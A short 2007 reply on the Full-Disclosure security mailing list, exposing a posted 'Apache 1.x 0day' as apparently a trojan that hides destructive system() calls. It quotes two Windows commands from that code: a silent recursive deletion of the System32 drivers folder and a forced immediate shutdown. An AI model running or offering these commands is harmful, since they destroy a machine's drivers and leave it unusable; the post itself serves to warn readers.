
Date: Mon, 19 Mar 2007 14:24:11 -0600
From: don bailey <don.bailey@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: A new apache 1.x 0day


> @del %SystemRoot%\System32\drivers\*.* /F /S /Q > nul
>   
> shutdown -s -f -t 0
>   
What, the attempt at visually obstructing the system() calls didn't give 
it away?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
